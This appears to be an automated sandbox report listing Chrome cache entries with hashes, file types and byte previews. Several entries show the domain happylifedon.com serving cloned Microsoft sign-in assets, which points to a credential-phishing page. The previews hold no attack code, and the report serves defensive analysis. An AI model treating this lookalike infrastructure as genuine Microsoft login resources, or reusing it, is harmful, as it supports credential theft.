                                                            Preview:......JFIF.....H.H.....fExif..MM.*.................>...........F.(...........1.........N.......H.......H....paint.net 4.2.9....C....................................................................C.........................................................................2..!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......[.4..lz.....K.S..p.>.9.r9j..'.\.qrW..mo...X9ZV<./x...EX...m.Prj..A.EtG...K..mr....Lc.T.*8...nlY.V.{6...*R...]..(.y...)^.5V.IVO.W.B.19.R\...f.U.....'..S:..k.6..*).f.n._3*....}.y.8.EusH..y.`.mA...W.}...bL..:..b.<f..(lH#R....v._...........9N~S..

                                                            Chrome Cache Entry: 159

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 600 x 1, 8-bit/color RGBA, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):132
                                                            Entropy (8bit):4.945787382366693
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:3EDA15637AFEAC6078F56C9DCC9BBDB8
                                                            SHA1:97B900884183CB8CF99BA069EEDC280C599C1B74
                                                            SHA-256:68C66D144855BA2BC8B8BEE88BB266047367708C1E281A21B9D729B1FBD23429
                                                            SHA-512:06B21827589FCAF63B085DB2D662737B24A39A697FF9138BDF188408647C3E90784B355F2B8390160CA487992C033CE735599271EE35873E1941812AB6C34B52
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/resources/images/0/sprite1.mouse.png
                                                            Preview:.PNG........IHDR...X..........x......sRGB.........gAMA......a.....pHYs..........o.d....IDATHK..1......Om.O ...j.a...\BW....IEND.B`.

                                                            Chrome Cache Entry: 160

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                            Category:downloaded
                                                            Size (bytes):621
                                                            Entropy (8bit):7.673946009263606
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://happylifedon.com/aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...

                                                            Chrome Cache Entry: 162

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113355
                                                            Category:downloaded
                                                            Size (bytes):20390
                                                            Entropy (8bit):7.9794389214686126
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:5EDF83D03EA7B67BD2F35472E435D17E
                                                            SHA1:737BF84D2931906E6700439FD90CE6147633B0D0
                                                            SHA-256:6524138B61AAF24DEADDA7C64AF577789C350C1ED90C48B6482011323C455513
                                                            SHA-512:DE3F83D1C11E1498C2D83DD72374755385DE76F870F54A2698D22DC7CE2F85B685690C93128A9A68D43DB94B7CCE1C45072521A5912E97F4FCACD341F162FA45
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://happylifedon.com/aadcdn.msauth.net/~/ests/2.1/content/cdnbundles/converged.v2.login.min_mc5ac6ol0l4d2iaqspstyg2.css
                                                            Preview:...........}ks.6.....\.R;.J.H=-WR;..&>g^53.G.R[.DY<C..$e.WG..... )...{+'g...l............bw_f7.:x..<x.-.*V5)/wE..Y...gy.0.*(.*-o.e.|..._..I.....?<{.!x...W..._..^..p..E..'..Y...<.....*]..6(. ..D..*...Y.......:.ve.?..!..|t...].+.......a.......|.P...u.H.d.d.r.c[..~.L..n.-.}e.H3...r..^..iP.u.*.z.....)..Z.jx..C'......u..{.C...N.o.m~..F(b..f.....h..O.....6....kr.......n2m M$.R..R..i{.~...*..n.dKY..#.Kn.4..G...O..l.#.a=..iU..].S.2.wY..O.|...Z.A....].uU.._%U.<...pp..u=.....C.R..S.....0...A<......&...W..'o.T.."..jO..^+.....DiW.b..7i..7..........lKe.0.~B0.....zQu#...YB.,.{*.&.6..G.6..._...J.i.?.LS$( .^.{..u.-.0....K....M&j..s.yB..+....^.)...7e.....]..eFI_.kRX.B......D[.4......+.u=>....R.`QEK...R..d...*S.. ,c5RKBK(......][..eF{T.....6...".....Uk:..S.0Ro.}B.dwJZ}U..S.F.....&.&.~|......{..Ep.>x..._....}p..=.}...v...7?}...g..1&.......}...^...o.x.>x...../.^....._.........w.v./.........BA...{J..w..$?.}w....?zO.r..5...7.gl..z...g.?.{....R.......yGj

                                                            Chrome Cache Entry: 163

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:downloaded
                                                            Size (bytes):1592
                                                            Entropy (8bit):4.205005284721148
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:4E48046CE74F4B89D45037C90576BFAC
                                                            SHA1:4A41B3B51ED787F7B33294202DA72220C7CD2C32
                                                            SHA-256:8E6DB1634F1812D42516778FC890010AA57F3E39914FB4803DF2C38ABBF56D93
                                                            SHA-512:B2BBA2A68EDAA1A08CFA31ED058AFB5E6A3150AABB9A78DB9F5CCC2364186D44A015986A57707B57E2CC855FA7DA57861AD19FC4E7006C2C239C98063FE903CF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://logincdn.msftauth.net/shared/5/images/signin_options_4e48046ce74f4b89d450.svg
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689,0,0,1,19,30a10.9,10.9,0,0,1-5.547-1.5,11.106,11.106,0,0,1-2.219-1.719A11.373,11.373,0,0,1,9.5,24.547a10.4,10.4,0,0,1-1.109-2.625A11.616,11.616,0,0,1,8,19a10.9,10.9,0,0,1,1.5-5.547,11.106,11.106,0,0,1,1.719-2.219A11.373,11.373,0,0,1,13.453,9.5a10.4,10.4,0,0,1,2.625-1.109A11.616,11.616,0,0,1,19,8a10.9,10.9,0,0,1,5.547,1.5,11.106,11.106,0,0,1,2.219,1.719A11.373,11.373,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9.269,9.269,0,0,0,

                                                            Chrome Cache Entry: 164

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):20
                                                            Entropy (8bit):3.8464393446710154
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:FFDF36EA8BC44BB187C17DE113EE5C5F
                                                            SHA1:315CCB39356B97B40797BB2AF89A7397B66D7EFE
                                                            SHA-256:B0613ED71834B726DC1241F28B12071A64B0CC19D99B33D834F1C06062BFE280
                                                            SHA-512:12D8B8487AEC51A95D945F8E2819DC7151D019DB09A8C1F76D463C63AA40CE3ABDBA08DA3FC4B0C20A311691C1AA24384C6B06EF5EC267F3240AF2FFB3F780E9
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlCt3QpV_m2AhIFDdFbUVI=?alt=proto
                                                            Preview:Cg0KCw3RW1FSGgQIZBgC

                                                            Chrome Cache Entry: 165

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:JPEG image data, baseline, precision 8, 1920x1080, components 3
                                                            Category:dropped
                                                            Size (bytes):17453
                                                            Entropy (8bit):3.890509953257612
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:7916A894EBDE7D29C2CC29B267F1299F
                                                            SHA1:78345CA08F9E2C3C2CC9B318950791B349211296
                                                            SHA-256:D8F5AB3E00202FD3B45BE1ACD95D677B137064001E171BC79B06826D98F1E1D3
                                                            SHA-512:2180ABE47FBF76E2E0608AB3A4659C1B7AB027004298D81960DC575CC2E912ECCA8C131C6413EBBF46D2AAA90E392EB00E37AED7A79CDC0AC71BA78D828A84C7
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

                                                            Chrome Cache Entry: 166

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text
                                                            Category:downloaded
                                                            Size (bytes):689017
                                                            Entropy (8bit):4.210697599646938
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:3E89AE909C6A8D8C56396830471F3373
                                                            SHA1:2632F95A5BE7E4C589402BF76E800A8151CD036B
                                                            SHA-256:6665CA6A09F770C6679556EB86CF4234C8BDB0271049620E03199B34B4A16099
                                                            SHA-512:E7DBE4E95D58F48A0C8E3ED1F489DCF8FBF39C3DB27889813B43EE95454DECA2816AC1E195E61A844CC9351E04F97AFA271B37CAB3FC522809CE2BE85CC1B8F0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://happylifedon.com/aadcdn.msauth.net/~/shared/1.0/content/js/ConvergedLogin_PCore_Kjlmc42uL0ATl_21eYcwVg2.js
                                                            Preview:.!(function (e) {. function n(n) {. for (var t, i, o = n[0], r = n[1], s = 0, c = []; s < o.length; s++). (i = o[s]),. Object.prototype.hasOwnProperty.call(a, i) && a[i] && c.push(a[i][0]),. (a[i] = 0);. for (t in r) Object.prototype.hasOwnProperty.call(r, t) && (e[t] = r[t]);. for (d && d(n); c.length; ) c.shift()();. }. var t,. i = {},. a = { 22: 0 };. function o(n) {. if (i[n]) return i[n].exports;. var t = (i[n] = { i: n, l: !1, exports: {} });. return e[n].call(t.exports, t, t.exports, o), (t.l = !0), t.exports;. }. Function.prototype.bind ||. ((t = Array.prototype.slice),. (Function.prototype.bind = function (e) {. if ("function" != typeof this). throw new TypeError(. "Function.prototype.bind - what is trying to be bound is not callable". );. var n = t.call(arguments, 1),. i = n.length,. a = this,. o = function () {},. r = function () {. return (.

                                                            Chrome Cache Entry: 167

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):28
                                                            Entropy (8bit):4.307354922057605
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9F9FA94F28FE0DE82BC8FD039A7BDB24
                                                            SHA1:6FE91F82974BD5B101782941064BCB2AFDEB17D8
                                                            SHA-256:9A37FDC0DBA8B23EB7D3AA9473D59A45B3547CF060D68B4D52253EE0DA1AF92E
                                                            SHA-512:34946EF12CE635F3445ED7B945CF2C272EF7DD9482DA6B1A49C9D09A6C9E111B19B130A3EEBE5AC0CCD394C523B54DD7EB9BF052168979A9E37E7DB174433F64
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnof8MRLJ050RIFDdFbUVISBQ1Xevf9?alt=proto
                                                            Preview:ChIKBw3RW1FSGgAKBw1Xevf9GgA=

                                                            Chrome Cache Entry: 168

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):3620
                                                            Entropy (8bit):6.867828878374734
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://happylifedon.com/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif
                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...

                                                            Chrome Cache Entry: 169

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):3.990210155325004
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.

                                                            Chrome Cache Entry: 170

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:SVG Scalable Vector Graphics image
                                                            Category:dropped
                                                            Size (bytes):1864
                                                            Entropy (8bit):5.222032823730197
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:BC3D32A696895F78C19DF6C717586A5D
                                                            SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                            SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                            SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                            Chrome Cache Entry: 171

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (65436)
                                                            Category:downloaded
                                                            Size (bytes):90690
                                                            Entropy (8bit):5.331029016047939
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:D390AA6A6D257834D807D8E7DDC90968
                                                            SHA1:6A6EFD105DBBEB099D25998A38875808D83AF5C8
                                                            SHA-256:D755D7CE744425DEE51A3BD8CBA9B2A789D96C584C9958082B557FEB70F226D9
                                                            SHA-512:9629ED6071CFED4EFF34C163F36482336F0D402FD95951FC792A5F125C1BE1CA3C6918E61A4A79815B15AB5CDD6BCEF30D4FE0090C283C02590B62879D960818
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://logincdn.msftauth.net/shared/5/chunks/oneds-analytics-js_54b1724af1b05e2ba3db_en.js
                                                            Preview:/*! For license information please see oneds-analytics-js_54b1724af1b05e2ba3db_en.js.LICENSE.txt */."use strict";(self.webpackChunk_msidentity_sisu_msa=self.webpackChunk_msidentity_sisu_msa||[]).push([[251],{41696:function(n,e,t){t.r(e),t.d(e,{AppInsightsCore:function(){return qo},ApplicationInsights:function(){return ja},BE_PROFILE:function(){return Vo},BaseTelemetryPlugin:function(){return di},Cloud:function(){return Vi},CoreUtils:function(){return Hr},Device:function(){return Xi},DiagnosticLogger:function(){return et},EventLatency:function(){return Ga},EventPersistence:function(){return Qa},EventsDiscardedReason:function(){return Ho},InternalAppInsightsCore:function(){return Ko},Loc:function(){return $i},LoggingSeverity:function(){return Wa},MinChannelPriorty:function(){return $a},NRT_PROFILE:function(){return Wo},NotificationManager:function(){return Uo},PostChannel:function(){return qa},PropertiesPlugin:function(){return Po},RT_PROFILE:function(){return jo},Session:function(){retu

                                                            Chrome Cache Entry: 172

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:HTML document, ASCII text
                                                            Category:downloaded
                                                            Size (bytes):315
                                                            Entropy (8bit):5.0572271090563765
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:A34AC19F4AFAE63ADC5D2F7BC970C07F
                                                            SHA1:A82190FC530C265AA40A045C21770D967F4767B8
                                                            SHA-256:D5A89E26BEAE0BC03AD18A0B0D1D3D75F87C32047879D25DA11970CB5C4662A3
                                                            SHA-512:42E53D96E5961E95B7A984D9C9778A1D3BD8EE0C87B8B3B515FA31F67C2D073C8565AFC2F4B962C43668C4EFA1E478DA9BB0ECFFA79479C7E880731BC4C55765
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:http://tuskerdigital.com/favicon.ico
                                                            Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL was not found on this server.</p>.<p>Additionally, a 404 Not Found.error was encountered while trying to use an ErrorDocument to handle the request.</p>.</body></html>.

                                                            Chrome Cache Entry: 173

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65339), with CRLF line terminators
                                                            Category:downloaded
                                                            Size (bytes):662286
                                                            Entropy (8bit):5.315860951951661
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:12204899D75FC019689A92ED57559B94
                                                            SHA1:CCF6271C6565495B18C1CED2F7273D5875DBFB1F
                                                            SHA-256:39DAFD5ACA286717D9515F24CF9BE0C594DFD1DDF746E6973B1CE5DE8B2DD21B
                                                            SHA-512:AA397E6ABD4C54538E42CCEDA8E3AA64ACE76E50B231499C20E88CF09270AECD704565BC9BD3B27D90429965A0233F99F27697F66829734FF02511BD096CF030
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/scripts/boot.worldwide.2.mouse.js
                                                            Preview:.window.scriptsLoaded = window.scriptsLoaded || {}; window.scriptProcessStart = window.scriptProcessStart || {}; window.scriptProcessStart['boot.worldwide.2.mouse.js'] = (new Date()).getTime();.._y.lC=function(){};_y.lC.registerInterface("_y.lC");_y.jw=function(){};_y.jw.registerInterface("_y.jw");_y.lA=function(){};_y.lA.registerInterface("_y.lA");var IDelayedSendEvent=function(){};IDelayedSendEvent.registerInterface("IDelayedSendEvent");var IIsShowingComposeInReadingPaneEvent=function(){};IIsShowingComposeInReadingPaneEvent.registerInterface("IIsShowingComposeInReadingPaneEvent");var ISendFailedO365Event=function(){};ISendFailedO365Event.registerInterface("ISendFailedO365Event");var ISendFailureRemoveO365Event=function(){};ISendFailureRemoveO365Event.registerInterface("ISendFailureRemoveO365Event");_y.gw=function(){};_y.gw.registerInterface("_y.gw");_y.iB=function(){};_y.iB.registerInterface("_y.iB");_y.ih=function(){};_y.ih.registerInterface("_y.ih");_y.jy=function(){};_y.jy.regis

                                                            Chrome Cache Entry: 174

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://happylifedon.com/aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..

                                                            Chrome Cache Entry: 176

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (994), with no line terminators
                                                            Category:downloaded
                                                            Size (bytes):994
                                                            Entropy (8bit):4.934955158256183
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:E2110B813F02736A4726197271108119
                                                            SHA1:D7AC10CC425A7B67BF16DDA0AAEF1FEB00A79857
                                                            SHA-256:6D1BE7ED96DD494447F348986317FAF64728CCF788BE551F2A621B31DDC929AC
                                                            SHA-512:E79CF6DB777D62690DB9C975B5494085C82E771936DB614AF9C75DB7CE4B6CA0A224B7DFB858437EF1E33C6026D772BE9DBBB064828DB382A4703CB34ECEF1CF
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://r4.res.office365.com/owa/prem/15.20.7741.25/resources/images/0/sprite1.mouse.css
                                                            Preview:.image-loading_blackbg-gif{background:url('loading_blackbg.gif');width:16px;height:16px}.image-loading_whitebg-gif{background:url('loading_whitebg.gif');width:16px;height:16px}.image-thinking16_blue-gif{background:url('thinking16_blue.gif');width:16px;height:16px}.image-thinking16_grey-gif{background:url('thinking16_grey.gif');width:16px;height:16px}.image-thinking16_white-gif{background:url('thinking16_white.gif');width:16px;height:16px}.image-thinking24-gif{background:url('thinking24.gif');width:24px;height:24px}.image-thinking32_blue-gif{background:url('thinking32_blue.gif');width:32px;height:32px}.image-thinking32_grey-gif{background:url('thinking32_grey.gif');width:32px;height:32px}.image-thinking32_white-gif{background:url('thinking32_white.gif');width:32px;height:32px}.image-clear1x1-gif{width:1px;height:1px;background:url('sprite1.mouse.png') -0 -0}.csimg{padding:0;border:none;background-repeat:no-repeat;-webkit-touch-callout:none}span.csimg{-ms-high-contrast-adjust:none}

                                                            Chrome Cache Entry: 177

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                            Category:dropped
                                                            Size (bytes):1435
                                                            Entropy (8bit):7.8613342322590265
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.

                                                            Chrome Cache Entry: 180

                                                            Download File
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (42690)
                                                            Category:downloaded
                                                            Size (bytes):42691
                                                            Entropy (8bit):5.373060430099094
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:985094F1486391033426C17505182792
                                                            SHA1:D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4
                                                            SHA-256:14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
